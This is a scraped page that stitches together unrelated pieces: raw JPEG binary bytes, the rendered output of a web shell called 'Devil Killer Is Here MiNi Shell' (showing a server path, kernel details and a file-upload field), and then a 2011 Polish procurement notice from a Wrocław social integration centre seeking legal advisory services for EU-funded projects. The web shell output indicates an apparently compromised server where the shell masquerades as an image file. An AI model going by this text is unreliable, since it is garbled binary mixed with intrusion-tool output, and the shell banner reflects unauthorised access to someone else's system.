JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110322/50550-N-2011.html

<p class="kh_header"><b>Wrocław: Usługi prawne w zakresie zadań realizowanych w ramach projektu EUROprzedsiębiorca 45+ oraz Droga do zatrudnienia
- Program Operacyjny Kapitał Ludzki -
realizowanych przez Centrum Integracji Społecznej we Wrocławiu</b><br>
<b>Numer ogłoszenia: 50550 - 2011; data zamieszczenia: 22.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Integracji Społecznej , ul. Strzegomska 49, 53-611 Wrocław, woj. dolnośląskie, tel. 71 782 35 11, faks 71 782 35 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cis.wroclaw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.cis.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi prawne w zakresie zadań realizowanych w ramach projektu EUROprzedsiębiorca 45+ oraz Droga do zatrudnienia
- Program Operacyjny Kapitał Ludzki -
realizowanych przez Centrum Integracji Społecznej we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Charakterystyka zamówienia
Przedmiotem zamówienia jest udzielenie doradztwa indywidualnego i grupowego, doradztwa prawnego i usług informacyjnych, doradztwa pomostowego indywidualnego z zakresu prawa na potrzeby projektu oraz dla uczestników projektu EUROprzedsiębiorca 45+- osób niezatrudnionych i zatrudnionych zamieszkałych na terenie Wrocławia oraz doradztwa indywidualnego z zakresu prawa dla uczestników projektu Droga do zatrudnienia, realizowanych w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego,
Przedmiotem zamówienia podzielony został na 3 części: część pierwsza  przeprowadzenie-udzielenie usług informacyjnych z zakresu prawa, część druga usługi doradcze: doradztwo indywidualne i grupowe z zakresu prawa dla uczestników projektu oraz doradztwo pomostowe indywidualne z zakresu prawa na potrzeby projektu EUROprzedsiębiorca 45+ - osób nieaktywnych zawodowo i zatrudnionych zamieszkałych na terenie Wrocławia, realizowanego w ramach  Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego oraz część trzecia usługi doradcze- doradztwo indywidualne z zakresu prawa dla uczestników projektu Droga do zatrudnienia realizowanego w ramach  Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.

PRZEDMIOT ZAMÓWIENIA OBEJMUJE NASTĘPUJĄCE CZĘŚCI:

Część I - pod nazwą: 
Przeprowadzenie-udzielenie usług informacyjnych z zakresu prawa
Minimalny zakres: 
1.	konsultacja dokumentów związanych z realizacją projektu EUROprzedsiebiorca 45+, w tym regulaminów, wniosków, umów o świadczenie usług szkoleniowo-doradczych, umów o przyznanie wsparcia na rozpoczęcie działalności gospodarczej, aneksów związanych z przyznaniem wsparcia pomostowego podstawowego i rozszerzonego oraz oświadczeń-zaświadczeń składanych przez uczestników projektu
2.	konsultacje zagadnień związanych z pomocą de minimis udzielaną uczestnikom projektu
3.	konsultacje zagadnień związanych z rozliczaniem wsparcia finansowego na rozpoczęcie działalności gospodarczej oraz wsparcia pomostowego
4.	analiza problemów wynikających z niezrealizowania umowy o przyznanie wsparcia finansowego na rozpoczęcie działalności gospodarczej oraz stosownych aneksów
5.	nadzór nad egzekucją  należności wynikających z nieprzestrzegania umowy o udzielenie wsparcia finansowego na rozpoczęcie działalności gospodarczej oraz wsparcia pomostowego;
6.	analiza prawidłowości sporządzenia pism oraz zachowania terminów wynikających z właściwych wytycznych

Część II - pod nazwą: 
Usługi doradcze: doradztwo indywidualne i grupowe z zakresu prawa dla uczestników projektu oraz doradztwo pomostowe indywidualne z zakresu prawa na potrzeby projektu EUROprzedsiębiorca 45+.
 
1.	Doradztwo grupowe z zakresu prawa (zakres) 
doradztwo realizowane w grupach służące pogłębieniu z zakresu tematyki poruszanej podczas szkoleń i obejmie doradztwo w zakresie zakładania i prowadzenia spółdzielni lub spółdzielni socjalnej, spółki cywilnej, działalności gospodarczej; doradztwo zostanie dopasowane do indywidualnych potrzeb uczestników, 
2.	Doradztwo indywidualne z zakresu prawa (zakres):
doradztwo indywidualne - jego celem jest rozwiązywanie indywidualnych problemów związanych z planowaną przez uczestników działalnością w formie jednoosobowej działalności gospodarczej, spółdzielni socjalnej lub spółki cywilnej - średnio 45 min na 1 uczestnika, łącznie 45h zegarowych na 60 uczestników
3.	Doradcze wsparcie pomostowe podstawowe
doradztwo indywidualne stanowiące pomoc efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min ,m-c, uczestnika), dla max. 60 uczestników
4.	Doradcze wsparcie pomostowe rozszerzone
doradztwo indywidualne stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min,m-c,uczestnika),

Część III - pod nazwą: 
Usługi doradcze- doradztwo indywidualne z zakresu prawa dla uczestników projektu Droga do zatrudnienia.
Minimalny zakres: 
1. Prawo cywilne:
poradnictwo z zakresu prawa zobowiązań,
poradnictwo z zakresu postępowania nieprocesowego,
poradnictwo z zakresu postępowań nakazowych i upominawczych.

2.	Prawo rodzinne:
poradnictwo i sporządzanie pozwów i pism procesowych w sprawach rozwodowych i separacyjnych,
poradnictwo i sporządzanie pozwów i pism procesowych w sprawach,
poradnictwo w zakresie rozdzielności majątkowej

3.	Prawo ubezpieczeń:
poradnictwo z zakresu spraw emerytalno - rentowych,
sporządzanie odwołań i pism procesowych w sprawach związanych z odwołaniami od decyzji ZUS-u,

4.	Poradnictwo z zakresu prawa pracy

5.	Poradnictwo - wraz ze sporządzaniem pism, wniosków i skarg - w postępowaniu z zakresu egzekucji administracyjnej i sądowej.

6.	Prawo lokalowe i ochrona praw lokatorów:
sprawy dotyczące uzyskania lub odzyskania tytułu prawnego do lokalu
poradnictwo z zakresu spraw dotyczących praw i obowiązków właścicieli, najemców, podnajemców itp.


Zakres i tematyka doradztwa związana będzie z bieżącymi potrzebami uczestników projektu Droga do zatrudnienia.

Zamówienie publiczne zalicza się do usług o charakterze niepriorytetowym w zakresie Usług prawniczych, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 28 stycznia 2010 r. w sprawie wykazu usług o charakterze priorytetowym i niepriorytetowym (Dz. U. z 2010 r. Nr 12, poz. 68)

Wymagania odnoście wszystkich części
a)	oznakowania wszystkich prezentacji multimedialnych i materiałów szkoleniowych poprzez umieszczenie logo według wytycznych opisanych w aktualnej wersji Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, która znajduje się na stronie www.pokl.dwup.pl oraz według wytycznych przyjętych dla Systemu Identyfikacji Wizualnej materiałów informacyjnych i promocyjnych Gminy Wrocław dostępnej w Biurze Promocji Miasta, ul. Przejście Żelaźnicze 17a, 50-107 Wrocław (w konsultacji z Zamawiającym) oraz logo projektu. Powyższe logotypy Zamawiający zobowiązuje się dostarczyć wcześniej;
b)	zapewnienia kadry o odpowiednim wykształceniu i doświadczeniu w prowadzeniu doradztwa z zakresu prawa; poświadczone odpowiednimi dokumentami. 
c)	   przygotowania i prowadzenia dokumentacji doradztwa, w tym list obecności, dzienników, sprawozdań z udzielonego doradztwa;
d)	  niezwłoczne informowanie Zamawiającego imiennie o nieobecności osób skierowanych przez Zamawiającego, nie zgłoszeniu się tych osób w celu udzielenia doradztwa.
Przy kalkulacji ceny ofertowej należy uwzględnić wszystkie koszty niezbędne do należytego wykonania przedmiotu zamówienia. 
Uczestnikami doradztwa w części II będą osoby niezatrudnione i zatrudnione, w części III osoby nieaktywne zawodowo zagrożone wykluczeniem społecznym, skierowane na szkolenie przez Zamawiającego, po przeprowadzeniu przez Zamawiającego postępowania rekrutacyjnego do udziału w szkoleniu/doradztwu objętym niniejszym zamówieniem.
1. Wymagana ilość godzin:
Cześć I:
Wymagana ilość godzin z zakresu doradztwa prawnego i usług informacyjnych:
1.	Doradztwo: średnio 25 h miesięcznie nie więcej niż 700 godzin, (godziny zegarowe=60 minut) 
Cześć II:
Wymagana ilość godzin doradztwa indywidualnego i grupowego:
2.	Doradztwo grupowe: 4 h na edycję x 3 edycji = 12 h, (godziny zegarowe=60 minut) 
3.	Doradztwo indywidualne: 15h x 3 edycje= 45 h (3 edycje x 20 osób, średnio 45 min na osobę),(godzina zegarowa=60 minut)

Wymagana ilość godzin z zakresu doradztwa pomostowego indywidualne z zakresu prawa:
1.	Doradztwo: od 10 do 1080h w okresie trwania projektu. (godzina zegarowa=60 minut)
Cześć III:
Wymagana ilość godzin z zakresu usług doradczych- doradztwo indywidualne z zakresu prawa dla uczestników projektu Droga do zatrudnienia.
1.	Doradztwo: średnio 30h miesięcznie, nie więcej niż 120 h (godzina zegarowa=60 minut)

Harmonogramy: 
Cześć I: 
w dni powszednie od poniedziałku do piątku w godzinach 8,00-16,00 w okresie od zawarcia umowy do V 2013
Cześć II: 
Doradztwo indywidualne i grupowe:
 w dni powszednie i weekendy w okresie VI-VII 2011, X-XI.2011, II-III 2012,


Doradztwo indywidualne pomostowe podstawowe i rozszerzone: 
w dni powszednie i weekendy w okresie IX 2011 - IV 2013
Cześć III:
Doradztwo indywidualne:
w dni powszednie od poniedziałku do piątku w godzinach 9,00-15,00 w okresie VI-IX.2011r.

Szczegółowy harmonogram doradztwa ze wskazaniem konkretnych terminów Wykonawca przedstawi i dostarczy Zamawiającemu co najmniej na 7 dni przed planowanym terminem rozpoczęcia realizacji doradztwa. 

2. Miejsce realizacji przedmiotu zamówienia: 	
Miejscem odbywania - realizacji przedmiotu zamówienia jest siedziba Zamawiającego,                        Ul. Strzegomska 49, 53-611 Wrocław,

3. Dokumentacja:
Zamawiający wymaga prowadzenia przez Wykonawcę dokumentacji przekazanej przez Zamawiającego, w tym karty doradztwa, dzienników, sprawozdań z udzielonego doradztwa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5, 79.14.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część I
Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał  co najmniej jedną usługę polegającą na obsłudze prawnej biura projektu finansowanego ze środków publicznych, w zakresie udzielania bieżących konsultacji pracownikom zamawiającego, weryfikacji regulaminów dotyczących wewnętrznych regulacji projektu, opracowanie umów z Beneficjentami, prowadzenia spraw spornych z beneficjentami i instytucjami trzecimi. Przez biuro projektu należy rozumieć dział albo komórkę  organizacyjną zajmującą się bezpośrednio organizacją i realizacją zadań wynikających z umowy o dofinansowanie ze środków publicznych.
część II
Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
1)	jedną usługę polegającą na świadczeniu usług doradztwa prawnego dla osób zamierzających rozpocząć prowadzenie działalności gospodarczej i spółdzielni socjalnej, oraz 
2)	2 usługi polegające na świadczeniu doradztwa dla podmiotów gospodarczych (np. przedsiębiorców, spółdzielni socjalnych, etc.) związane z prowadzeniem działalności gospodarczej lub spółdzielni socjalnej, z których co najmniej jedna obejmowała swoim zakresem 200 godzin doradztwa.
część III
Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
1)	dwie usługi polegające na świadczeniu usług doradztwa prawnego dla osób znajdujących się w trudnej sytuacji życiowej i ekonomicznej - w zakresie zobowiązań, poradnictwa z zakresu postępowania nieprocesowego, spraw dotyczących uzyskania lub odzyskania tytułu prawnego do lokalu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część I
Wykonawca wykaże, że dysponuje osobami:
Co najmniej jedną osobą posiadającą tytuł Radcy Prawnego lub Adwokata, spełniającą poniższe wymagania:
1)	Posiadać doświadczenie w prawnej obsłudze biura projektu finansowanego ze środków publicznych. Przez biuro projektu należy rozumieć dział albo komórkę  organizacyjną zajmującą się bezpośrednio organizacją i realizacją zadań wynikających z umowy o dofinansowanie ze środków publicznych.
2)	Przeprowadził co najmniej 2 szkolenia lub świadczył doradztwo na rzecz jednego podmiotu z zakresu pomocy de minimis 
3)	Posiada minimum 3 letnie doświadczenie w świadczeniu pomocy prawnej po uzyskaniu wpisu na listę Radców Prawnych lub Adwokatów
część II
Wykonawca wykażę, że dysponuje osobami:
Co najmniej jedną osobą spełniającą poniższe wymagania:
1)	wykształcenie wyższe magisterskie prawnicze,
2)	posiada minimum 3 letnie doświadczenie w doradztwie prawnym po ukończeniu studiów,
część III
Wykonawca wykaże, że dysponuje osobami:
Co najmniej jedną osobą spełniającą poniższe wymagania:
1)	wykształcenie wyższe magisterskie prawnicze,
2)	posiada minimum 3 letnie doświadczenie w doradztwie prawnym po ukończeniu studiów,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokumenty potwierdzające należyte wykonanie usług</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cis.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Integracji Społecznej
ul. Strzegomska 49 53-611 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2011 godzina 14:00, miejsce: Centrum Integracji Społecznej
ul. Strzegomska 49 53-611 Wrocław
parter - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekty współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie/udzielenie usług informacyjnych z zakresu prawa na potrzeby projektu EUROprzedsiębiorca 45+.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny zakres: 
1.	konsultacja dokumentów związanych z realizacją projektu EUROprzedsiebiorca 45+, w tym regulaminów, wniosków, umów o świadczenie usług szkoleniowo-doradczych, umów o przyznanie wsparcia na rozpoczęcie działalności gospodarczej, aneksów związanych z przyznaniem wsparcia pomostowego podstawowego i rozszerzonego oraz oświadczeń/zaświadczeń składanych przez uczestników projektu
2.	konsultacje zagadnień związanych z pomocą de minimis udzielaną uczestnikom projektu
3.	konsultacje zagadnień związanych z rozliczaniem wsparcia finansowego na rozpoczęcie działalności gospodarczej oraz wsparcia pomostowego
4.	analiza problemów wynikających z niezrealizowania umowy o przyznanie wsparcia finansowego na rozpoczęcie działalności gospodarczej oraz stosownych aneksów
5.	nadzór nad egzekucją  należności wynikających z nieprzestrzegania umowy o udzielenie wsparcia finansowego na rozpoczęcie działalności gospodarczej oraz wsparcia pomostowego;
6.	analiza prawidłowości sporządzenia pism oraz zachowania terminów wynikających z właściwych wytycznych

Wymagana ilość godzin z zakresu doradztwa prawnego i usług informacyjnych:
1.	Doradztwo: średnio 25 h miesięcznie nie więcej niż 700 godzin, (godziny zegarowe=60 minut) 

w dni powszednie od poniedziałku do piątku w godzinach 8,00-16,00 w okresie od zawarcia umowy do V 2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5, 79.14.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi doradcze: doradztwo indywidualne i grupowe z zakresu prawa dla uczestników projektu oraz doradztwo pomostowe indywidualne z zakresu prawa na potrzeby projektu EUROprzedsiębiorca 45+..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Doradztwo grupowe z zakresu prawa (zakres) 
doradztwo realizowane w grupach służące pogłębieniu z zakresu tematyki poruszanej podczas szkoleń i obejmie doradztwo w zakresie zakładania i prowadzenia spółdzielni lub spółdzielni socjalnej, spółki cywilnej, działalności gospodarczej; doradztwo zostanie dopasowane do indywidualnych potrzeb uczestników, 



2.Doradztwo indywidualne z zakresu prawa (zakres):
doradztwo indywidualne - jego celem jest rozwiązywanie indywidualnych problemów związanych z planowaną przez uczestników działalnością w formie jednoosobowej działalności gospodarczej, spółdzielni socjalnej lub spółki cywilnej - średnio 45 min na 1 uczestnika, łącznie 45h zegarowych / 60 uczestników
3.	Doradcze wsparcie pomostowe podstawowe
doradztwo indywidualne stanowiące pomoc efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min /m-c/uczestnika), dla max. 60 uczestników
4.	Doradcze wsparcie pomostowe rozszerzone
doradztwo indywidualne stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika),
1.	Doradztwo grupowe: 4 h na edycję x 3 edycji = 12 h, (godziny zegarowe=60 minut) 
2.	Doradztwo indywidualne: 15h x 3 edycje= 45 h (3 edycje x 20 osób, średnio 45 min na osobę),(godzina zegarowa=60 minut)
Wymagana ilość godzin z zakresu doradztwa pomostowego indywidualne z zakresu prawa:
